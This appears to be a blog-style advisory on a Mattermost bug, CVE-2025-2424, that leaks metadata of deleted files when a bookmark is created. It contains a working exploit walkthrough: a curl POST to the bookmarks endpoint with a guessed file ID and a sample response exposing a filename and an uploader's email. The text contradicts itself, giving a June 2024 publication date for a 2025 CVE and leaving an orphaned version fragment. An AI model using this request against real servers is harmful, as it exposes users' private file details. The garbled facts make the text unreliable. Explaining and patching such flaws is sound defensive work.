CVE-2025-2424 - Mattermost Bookmark Metadata Disclosure Vulnerability Explained

*Published: June 2024*

Introduction

Recently, a security vulnerability identified as CVE-2025-2424 was discovered in the popular open-source team messaging platform, Mattermost. This issue affects versions 10.5.x <= 10.5.1 and 9.11.x <= 9.11.9. The problem revolves around how Mattermost handles bookmarks that refer to files, specifically failing to properly check if a file has already been deleted. In this article, we will break down what this means, show a sample exploit, and discuss what admins and users can do.

What’s The Problem?

When a user uploads a file to Mattermost, the platform assigns the file a unique ID. Later, that file might be deleted from the server for various reasons—maybe the user removes it, or it is auto-cleaned to save space. Normally, once deleted, the data and its metadata (like filename, uploader, upload date, type) should not be accessible.

However, when a user (or attacker) tries to create a Bookmark using the file ID of a _deleted_ file, Mattermost does not properly verify that the file no longer exists. Instead, it coughs up some leftover file metadata in its response. This leak can be abused by anyone who guesses or discovers valid, but deleted, file IDs.

9.11.x, up to and including 9.11.9

Upgrading to 10.5.2, 9.11.10, or later versions patches this vulnerability.

The Flaw

When a bookmark is created with an arbitrary file ID, the Mattermost backend should confirm that the file exists and deny the bookmark if not. Instead, it returns partial metadata about the requested file, even if it has been deleted.

This is a classic case of Insecure Direct Object Reference (IDOR) mixed with an improper existence check.

Real-World Exploit Scenario

1. Attacker knows or can guess valid file IDs (sometimes predictable, or could be leaked via logs, links, or brute-forcing the API).
2. Even if the files have been deleted, the attacker sends an API request to create a bookmark for those file IDs.
3. The Mattermost server responds with some metadata about the deleted files, such as upload timestamps, filenames, user info, and file type.

Step 1: Find a File ID

File IDs in Mattermost are usually 26-character alphanumeric strings (e.g. e3c6cp5dcfbm7xr4r5ycmo8zzy).

The vulnerable endpoint is typically

POST /api/v4/bookmarks

With a JSON body like

{
  "file_id": "e3c6cp5dcfbm7xr4r5ycmo8zzy",
  "name": "Interesting Bookmark"
}

Using curl or any HTTP client (replace TOKEN and URL)

curl -X POST "https://YOUR.MATTERMOST.SERVER/api/v4/bookmarks"; \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"file_id":"e3c6cp5dcfbm7xr4r5ycmo8zzy","name":"Interesting Bookmark"}'

Suppose the target file was deleted, you might still get data like

{
  "id": "1b2c3d4e5f6g7h8i9jklmno",
  "file_id": "e3c6cp5dcfbm7xr4r5ycmo8zzy",
  "user_id": "uvwx1234yz5678abcd90efgh",
  "created_at": 170942000000,
  "metadata": {
    "filename": "sensitive_document.pdf",
    "mime_type": "application/pdf",
    "file_size": 845312,
    "uploader": "alice.smith@example.com"
  }
}

Now the attacker knows details about a file that should no longer be discoverable through the UI or search—even details about deleted files.

Reconnaissance: Attackers can enumerate deleted filenames, types, sizes, and user info.

- Privacy: Files that were intentionally deleted (for legal or privacy reasons) could leak identifying info.
- Targeted Attacks: Knowing who uploaded what (and when) can help in phishing or blackmail attempts.

Upgrade Mattermost: Apply the official patch; upgrade to at least 10.5.2 or 9.11.10.

- Mattermost Security Updates
- Audit File IDs: Treat IDs as sensitive; monitor access logs for abuse attempts on /api/v4/bookmarks.

References

- Mattermost Security Bulletin for CVE-2025-2424
- Official GitHub CVE entry (pending)
- General guide to IDOR vulnerabilities

Conclusion

The CVE-2025-2424 vulnerability in Mattermost is critically important if you rely on the privacy and security of your messaging workspace. By failing to check if a file still exists when creating bookmarks, the platform leaks metadata about deleted files to anyone who tries their IDs. Patch your systems, monitor for suspicious API activity, and stay aware!


If you'd like a code PoC or guidance for patching, feel free to reach out or check the official Mattermost channels.

Timeline

Published on: 04/14/2025 15:15:24 UTC
Last modified on: 04/15/2025 18:39:27 UTC